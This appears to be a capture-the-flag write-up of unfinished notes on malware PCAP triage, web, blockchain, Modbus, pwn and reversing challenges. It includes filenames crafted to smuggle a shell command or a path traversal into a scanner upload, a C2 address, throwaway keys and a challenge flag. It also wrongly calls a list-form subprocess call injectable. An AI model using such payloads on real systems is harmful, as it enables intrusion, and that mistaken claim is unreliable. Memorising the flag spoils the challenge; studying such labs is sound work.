I went back to the PCAP and started from the top, and noticed that an outbound request was made to bzib.nelreports.net, which displays a page saying "Your Functions 3.0 app is up and running", but found nothing further. The domain has been around since 2021 and there are no indications that it is malicious. There was another request to https://sb.scorecardresearch.com/, but some research indicated that the site just served to conduct web tagging for analytical purposes.

Next one of interest was trc.taboola.com, which had a lot of hits on VirusTotal, but seemed to only be an ads-related site. Same with sync.outbrain.com, code.yengo.com, eb2.3lift.com, cm.mgid.com, trace.mediago.io, trace.popin.cc, recs.engageya.com, abema.tv, and www.stream.co.jp. I did notice that an initial request to v10.events.data.microsoft.com was made before most of the ones to v10.events.data.microsoftcloudservices.com, but I don't see how that helps us.

To filter down to only the malicious requests, we can use dns.qry.name contains "v10.events.data.microsoftcloudservices.com"; inversely, that filter can be reversed with !(...) to get all the other traffic. This didn't highlight anything other than the list of applications that the user had installed:

  • Discord
  • Slack
  • Grammarly
  • Microsoft Edge
  • Skype
  • Video LAN (?)
  • Firefox
  • 1password

No Start Where

As echoes of the Dark War lingered in UNZ's cyber-warfare HQ, a beacon blinked ominously. An analyst turned a wary eye to the screen. The alarm signal originated from the main system that controls the mining machinery! It was an attack from the Board of Arodor, aimed at crippling the mining infrastructure. Initial investigation of the network traffic revealed that the system has been compromised! Your task is to disinfect the system by uncovering the infiltration method and potential post-exploitation steps!

capture.pcap

The PCAP only has 1499 packets, so parsing through it manually for an initial triage won't take too long. The first thing I noticed is an HTTP request to http://140.238.217.117:4953/Security Baseline Discipline.zip, so I decided to export the HTTP object to take a look at the file's contents.

Before opening anything, I ran the ZIP through Hybrid Analysis to get an idea of the malicious potential. It said the Word Doc is clean but the baseline.scr file is malicious, so I decided to open the Word Doc first. There wasn't anything interesting in the file, so I did a quick scan of the metadata just in case there were any hints. We did get the following pieces of info, which are not immediately useful:

  • Author: Miller, Kim
  • Company: State of New Hampshire
  • Create time: 28-03-2023 09:54:00
  • Last saved by: Long Nguyen
  • Last saved time: 12-06-2023 04:39:00
  • Title: Vendor Risk Assessment Report

Next I uploaded the baseline.scr to Hybrid Analysis and Virus Total, and both were confident that it was malware. I paused here to continue looking through the PCAP, and the next thing I noticed was the executable WINWORD.EXE in packet 397. It didn't appear to be malicious and couldn't run on my device, so I left it alone for the time being.

I saw a good amount of data being POSTed in packets 807 and 848, so I made a note to circle back because data exfil might be taking place. The client also received a good bit of data in packet 1437, but when I uploaded the hex to CyberChef I wasn't able to make any sense of it or determine a data type. It looks like that data was a response to a typical ping that had been made many times throughout the capture, so it may have been a command from the C2 at 140.238.217.117. On a whim I tried visiting the IP, but no dice.

It seems the only relevant traffic to the chall is http, so I went ahead and applied that as a filter to bring us down to 142/1499 packets. When I looked deeper into the regular ping-like outbound connections, the hex for the media type caught my attention: 00000014deadbeef1945acc4000000000000000120667411. I remembered seeing deadbeef somewhere else, but some Googling didn't return anything useful for this challenge, so I discarded it; however, that same value was used for every ping-like POST request, so it may be a way to identify the system to the C2.

When I returned to packet 848, I tried exporting it as a file and inspecting the contents to determine the file type, but no dice. I wasn't able to discern anything from that packet. I circled back to the .scr file to see if that was the missing link that would allow us to better decode the C2 comms for the rest of the capture. When I ran strings ./baseline.scr -n 6, the only interesting thing I saw was publicKeyToken="6595b64144ccf1df", which Google said is used to force older programs to use XP common controls. This had some overlap with this blog post, so it may be worth returning to.

I tried running the .scr file in Windows Sandbox, but it gave the error popup There was a problem starting bundau.dll: The specified module could not be found. Next I tried on any.run, but was met with the same error of the executable being unable to run due to an OS version mismatch.

Web

Lazy Ballot

As a Zenium State hacker, your mission is to breach Arodor's secure election system, subtly manipulating the results to create political chaos and destabilize their government, ultimately giving Zenium State an advantage in the global power struggle.

First thing we need to do is log in to the server, and we can see in database.js where the only user is created:

const pass = crypto.randomBytes(13).toString("hex");

this.userdb = this.couch.use("users");
let adminUser = {
    username: "admin",
    password: pass,
};

this.userdb.insert(adminUser, adminUser.username);
this.seedVotes();

I ran that code locally to see what the password would look like, and the text I got is f30a8f4db216981758079b17e8. This looks like it would take a while to brute force, so there is likely a better way to go about gaining authentication.

I attempted to write a brute force program in Python anyways as a backup plan while I looked for something else, which is available here.

Polaris Control

During the Dark War, the Zenium State, facing resource scarcity, sought to hack into Arodor's notorious malware command and control system, Polaris Control, to gain an advantage in the Mars space race. State hackers have contacted you claiming to have spotted a small programming error by performing tedious enumeration, can you help them escalate it?

The first interesting thing I notice is that the flag file is renamed in entrypoint.sh, so it becomes something like flagd05b576afe.txt. The flag isn't mentioned directly anywhere else in the code, so that means we're likely looking for some form of RCE or LFI to gain access to the contents.

Instead of searching through everything manually, I decided to try to look for a static code analysis tool to do some of the heavy lifting for me.

First I tried horusec:

docker run horuszup/horusec-cli:latest horusec start -p . -P $(pwd)

Blockchain

After a lifetime of preparation, the moment has arrived to enlist in the esteemed military of the United Nations of Zenium as an expert in blockchain security. Before embarking on your duties, there is a small matter of paperwork that requires your attention.

First step was running python3 -m pip install web3 py-solc-x eth-account, then I connected to the server with nc 94.237.57.211 45577 to get the relevant connection information:

Private key     :  0x188d2ed79de415be6095c768dc8d6f06ae002b71a490621be7e98afb7989aeb0
Address         :  0xb977eB04D06A88cB527F7B41b146D5b8E6EABd8B
Target contract :  0x8D9D0EF5b040BB7151f398aB26bE5e556E4c033e
Setup contract  :  0x337dDb372d64A7984200Ea3789d72eA64CD784b1

To get the ABI for the contracts, they first need to be compiled:

npm install -g solc@0.8.18
solcjs --version
solcjs --abi Contract.sol Setup.sol

I used the Python script sign_contract.py to sign the contract, and it worked!

Answer: HTB{c0n9247u14710n5_y0u_423_kn0w_p427_0f_7h3_734m}; 325 points

Funds Secured

In Arodor, a state-of-the-art crowdfunding program fueled groundbreaking research. Powered by a smart contract, the program aimed to raise funds. Overseeing this campaign was a council board, responsible for finalizing the program through a multi-signature wallet scheme. Your goal is to exploit the contract and steal the funds, posing a threat to Arodor's noble scientific mission.

First thing was to get the connection information with nc 83.136.255.143 59550:

Private key           :  0xe3997abc7297602e92fa1a5ab0500a28cd9935dd35cfb1d823c6bc56fce6df48
Address               :  0xA51627d36347f40389bA45656b0a8243684d0385
Crowdfunding contract :  0x6741c5fC4AFF783547152dDC0Cc3FcCd2983aBeB
Wallet contract       :  0x5b700566E46CcCB12A063548DF20dbB5eeFb3E49
Setup contract        :  0x7E2b060F530ccb617CB42A64D036c7b6Ff153e84

Then I created the ABI files:

solcjs --abi Campaign.sol Setup.sol

Crypto

Initialization

During a cyber security audit of your government's infrastructure, you discover log entries showing traffic directed towards an IP address within the enemy territory of "Oumara". This alarming revelation triggers suspicion of a mole within Lusons' government. Determined to unveil the truth, you analyze the encryption scheme with the goal of breaking it and decrypting the suspicious communication. Your objective is to extract vital information and gather intelligence, ultimately protecting your nation from potential threats.

I'm gRoot

After decrypting the communication, you uncover the identity of the mole as the senior blockchain developer. Shockingly, the developer had embedded a backdoor in the government's decentralized blockchain network, originally designed to prevent corruption. You report this critical finding to the government council and are assigned with the task of detecting and fixing the backdoor, ensuring the integrity and security of the network.

Scada

Watch Tower

Our infrastructure monitoring system detected some abnormal behavior and initiated a network capture. We need to identify information the intruders collected and altered in the network.

Intrusion

After gaining access to the enemy's infrastructure, we collected crucial network traffic data from their Modbus network. Our primary objective is to swiftly identify the specific registers containing highly sensitive information and extract that data.

ics_intrusion

The PCAP consists entirely of modbus traffic, so that filter is not needed. I was able to use the following filters to separate the data into the three different segments that comprised the entirety of the PCAP:

# Reading coils
modbus.func_code == 1
# Writing to multiple coils
modbus.func_code == 15
# Writing to multiple registers
modbus.func_code == 16

There was hardly any useful data in the capture, but the different possible commands are available here. I decided to use a generic command on a few different addresses to see if I could find anything:

# I'm assuming that "Unit identifier" is the same as *slave_id* in the documentation
# *address* is the reference number from the PCAP, i.e. 0x00b3 here is 179 in decimal
command = tcp.read_holding_registers(address=0x00b3, count=100)
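The function-code split above (1, 15, 16) can be done offline on the raw frames instead of through the Wireshark filter, and the FC16 requests are where written register contents live. This is an added example, not part of the writeup or of any Modbus library; it decodes client-to-server request ADUs only, and the three frames are constructed (the start address 0x00b3 is the one mentioned above).

```python
"""Parse Modbus/TCP request frames and collect the register values carried by
function codes 1, 15 and 16. Added example with constructed sample frames; it
assumes the frames are requests (client -> server), not responses."""
import struct
from dataclasses import dataclass, field
from typing import Dict, List

FUNC_NAMES = {1: "Read Coils", 15: "Write Multiple Coils", 16: "Write Multiple Registers"}


@dataclass
class ModbusRequest:
    transaction_id: int
    unit_id: int          # "Unit identifier" in the PCAP, slave id in most libraries
    func_code: int
    start_address: int
    quantity: int
    registers: List[int] = field(default_factory=list)   # FC16: 16-bit values written
    coils: List[bool] = field(default_factory=list)      # FC15: coil states written


def parse_request(adu: bytes) -> ModbusRequest:
    """Decode one Modbus/TCP request ADU: 7-byte MBAP header followed by the PDU."""
    if len(adu) < 12:
        raise ValueError("ADU too short for header, function code, address and quantity")
    tid, proto, length, unit, func = struct.unpack(">HHHBB", adu[:8])
    if proto != 0:
        raise ValueError(f"unexpected protocol id {proto}")
    # The MBAP length field counts the unit id byte plus the whole PDU.
    if length != len(adu) - 6:
        raise ValueError(f"MBAP length {length} does not match frame size")
    if func not in FUNC_NAMES:
        raise ValueError(f"function code {func} not handled here")
    start, qty = struct.unpack(">HH", adu[8:12])
    req = ModbusRequest(tid, unit, func, start, qty)
    if func in (15, 16):
        byte_count = adu[12]
        payload = adu[13:13 + byte_count]
        if len(payload) != byte_count:
            raise ValueError("byte count exceeds frame")
        if func == 16:
            if byte_count != 2 * qty:
                raise ValueError("byte count does not match register quantity")
            req.registers = list(struct.unpack(f">{qty}H", payload))
        else:
            # Coil states are packed LSB-first within each byte.
            req.coils = [bool((payload[i // 8] >> (i % 8)) & 1) for i in range(qty)]
    return req


def registers_as_text(values: List[int]) -> str:
    """Render 16-bit registers as big-endian bytes, printable ASCII only."""
    raw = b"".join(struct.pack(">H", v) for v in values)
    return "".join(chr(b) if 32 <= b < 127 else "." for b in raw)


def collect_written_registers(frames: List[bytes]) -> Dict[int, int]:
    """Map register address -> last value written to it by any FC16 request."""
    written: Dict[int, int] = {}
    for adu in frames:
        try:
            req = parse_request(adu)
        except ValueError:
            continue  # malformed frame or a function code this parser does not cover
        if req.func_code == 16:
            for offset, val in enumerate(req.registers):
                written[req.start_address + offset] = val
    return written


# Constructed sample frames: one request of each shape the writeup filters on.
SAMPLE_FRAMES = [
    bytes.fromhex("0001 0000 0006 01 01 0000 0010"),                 # FC1: read 16 coils at 0
    bytes.fromhex("0002 0000 0009 01 0f 0010 0009 02 5501"),         # FC15: write 9 coils at 16
    bytes.fromhex("0003 0000 000d 01 10 00b3 0003 06 4f4b 2d31 3233"),  # FC16: 3 regs at 179
]

if __name__ == "__main__":
    for addr, val in sorted(collect_written_registers(SAMPLE_FRAMES).items()):
        print(f"register {addr}: 0x{val:04x}")
    print(registers_as_text(parse_request(SAMPLE_FRAMES[2]).registers))
```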

Fullpwn

Langmon

First thing here was to download OpenVPN and connect to the CTF infra so we can interact with the box.

Pwn

Snow Scan

In a rapidly unfolding scenario, an ancient Sumerian virus has surfaced, rapidly proliferating and posing a grave threat. Snow Crash, a menacing presence within the metaverse, has ventured beyond virtual realms, unleashing tangible repercussions in real life. In response to this crisis, the Board of Arodor has devised a vital tool—a service designed to meticulously scan and identify potential samples of Snow Crash. Would you consider harnessing this service to counter their efforts?

pwn_snowscan

Looking at the Dockerfile, we can see that we will need to use the user ctf on port 1337 to interact with the challenge located at /home/ctf/challenge. We can also see that there is an uploads folder that will likely be important. The flag.txt file will be located in the challenge directory, so we need to find a way to read it.

There is a snowscan binary in the challenge directory, so I parsed through it with strings ./snowscan -n 6 but didn't find anything of interest. Running it said that we needed to provide a file as an argument; when I tried with flag.txt, it said that only .bmp files were accepted. Based on the snowscan.c file, I'd say the binary is just a precompiled version of the source code.

Whenever I loaded up the site in my browser, I could see the rendition of the index.html page template. The associated JS on image upload just checks the file type for .bmp and then POSTs it to the /snowscan endpoint, which returns a redirect to a response page (results.html). When I uploaded the provided dummy.bmp file, I got 25 PASS results, but nothing happened; the response parameter was just a URL-encoded plaintext of the result text.

I tried navigating to the /uploads/dummy.bmp endpoint, but the server didn't load it because it isn't a route in the Flask app in server.py. Looking more through that file, I can see the vulnerability:

@app.route('/snowscan', methods=['POST'])
def snowscan():
  file = request.files['file']
  # sanitize filename
  filename = re.sub(r'[^a-zA-Z0-9_.-]', '', file.filename)
  file_path = os.path.join(UPLOAD_DIR, filename)
  if request.content_length > MAX_FILE_SIZE:
    return 'File exceeds max size'
  file.save(file_path)
  try:
    # VULNERABILITY HERE!
    output = subprocess.run([SCANNER, file_path], capture_output=True, text=True, timeout=1).stdout
  except subprocess.CalledProcessError as e:
    output = e
  return output

The subprocess.run call is vulnerable to command injection, so we can use that to read the flag file if we can bypass the regex filename sanitization.

My initial ideas were:

  1. Use something like cat /home/ctf/challenge/flag.txt; #dummy.bmp as the file name
  2. Use URL encoding in the file name like %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fhome%2fctf%2fchallenge%2fflag.txt #.bmp

Unfortunately neither of those did the trick, because the data we get back depends on the return of the snowscan binary. Unfortunately, looking at the binary, I can't see any way to take advantage of the subprocess.run because the return values of PASS and FAIL are hardcoded.
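To see concretely why neither name worked, here is the handler's sanitiser and the argv it hands to subprocess, applied to the two attempts above, alongside a stricter variant of the same check. This is an added example, not the challenge's server.py; UPLOAD_DIR and SCANNER are assumed paths.

```python
"""What /snowscan does with a hostile filename, and a hardened version of the
same check. Added example; UPLOAD_DIR and SCANNER are assumed paths."""
import os
import re

UPLOAD_DIR = "/home/ctf/challenge/uploads"   # assumed
SCANNER = "/home/ctf/challenge/snowscan"     # assumed


def sanitize_as_server(name: str) -> str:
    """The handler's regex: delete every character outside [a-zA-Z0-9_.-]."""
    return re.sub(r"[^a-zA-Z0-9_.-]", "", name)


def scanner_argv(name: str) -> list:
    """The argv the handler builds. subprocess.run gets a list and no shell=True,
    so ';', '#' and spaces in the name could never start a second command even
    if the regex let them through; they would only be part of one argument."""
    return [SCANNER, os.path.join(UPLOAD_DIR, sanitize_as_server(name))]


def sanitize_hardened(name: str) -> str:
    """Stricter check: reject instead of strip, require a .bmp suffix, refuse
    dot-only names such as '..' (which the regex leaves intact), and confirm
    the final path stays inside UPLOAD_DIR."""
    base = os.path.basename(name)  # drop any client-supplied directory part
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}\.bmp", base):
        raise ValueError("filename must be a short [A-Za-z0-9_-] name ending in .bmp")
    path = os.path.realpath(os.path.join(UPLOAD_DIR, base))
    if os.path.dirname(path) != os.path.realpath(UPLOAD_DIR):
        raise ValueError("path escapes the upload directory")
    return path


def is_accepted(name: str) -> bool:
    """True when the hardened check accepts the name."""
    try:
        sanitize_hardened(name)
        return True
    except ValueError:
        return False


# The two names tried in the writeup (constructed input for this example).
ATTEMPTS = [
    "cat /home/ctf/challenge/flag.txt; #dummy.bmp",
    "%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fhome%2fctf%2fchallenge%2fflag.txt #.bmp",
]

if __name__ == "__main__":
    for name in ATTEMPTS:
        print(scanner_argv(name))
    for name in ("dummy.bmp", "..", "flag.txt", "a b.bmp"):
        print(name, "->", "accepted" if is_accepted(name) else "rejected")
```

Both attempts collapse into a single harmless filename inside the upload directory, which is why the server only ever ran the scanner on a file that did not exist as a BMP.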

Device Control

You managed to successfully breach the enemy's device control server! With this accomplishment, you now possess a significant opportunity: to either mislead them through the creation of counterfeit devices or to delve deeper into the system and exploit it for complete system access. Choosing the former path allows you to manipulate their perceptions, potentially leading them astray and buying valuable time. However, should you opt for the latter, you can uncover hidden vulnerabilities and harness the system to your advantage, potentially neutralizing the enemy's capabilities entirely. The choice is yours

The user we are is ctf, and the flag is located at /home/ctf/challenge/flag.txt.

We can connect to the server with socat `tty`,raw,echo=0 tcp:83.136.255.242:32856, but once we do the display is confusing:

socat_display

Adding a device allows us to select a slot, input a name, and add an IP address. Then when we select Show devices, a random country has been added to the VPN column; I saw France, Portugal, Vietnam, etc. Selecting Configure VPN allows us to change the country on a given slot, but every time I enter a name it gives an error like This location is not allowed: [Brazil] for whatever I entered, even with countries that were autopopulated initially.

However, entering the same country name works, and we get the message Country Changed!. The next prompt indicates that we're on the right track: Do you want to unlock the configuration of more devices? (y/n). If we enter y, we are prompted to Enter license key. We can see that this information is stored in /home/ctf/challenge/license.conf and it follows the format XXXX-XXXX-XXXX-XXXX-XXXX, but we don't know what the key is on the server.

Running strings ./device_control -n 6 on our local binary gives some useful info, such as a list of countries (Greece, Serbia, Italia, France, Portugal, Netherlands, Switzerland, Germany). We can see that the license.conf file is accessed after we input our license key, but can't see how to take advantage of it. There are two strings right after that are interesting:

  • Error opening license.conf, please contact an Administrator.
  • By entering this key, you can change VPN for all your devices.

But that's it.

Reversing

Intelligence Service

We've received some powerful intelligence gathering software from intercepting Arodor communications. Unfortunately, it requires a license key. Can you try and crack the keychecker?

Running strings ./service showed us the following info, which let us know that we need to use some actual rev software:

Welcome to our premium agency intelligence service!
To start using the service, please enter the key provided in the confirmation e-mail.
Activation Key:
[+] Activation key successfully redeemed; Thank you for using our services!
[!] Activation key invalid or expired

I decided to give Ghidra a go...

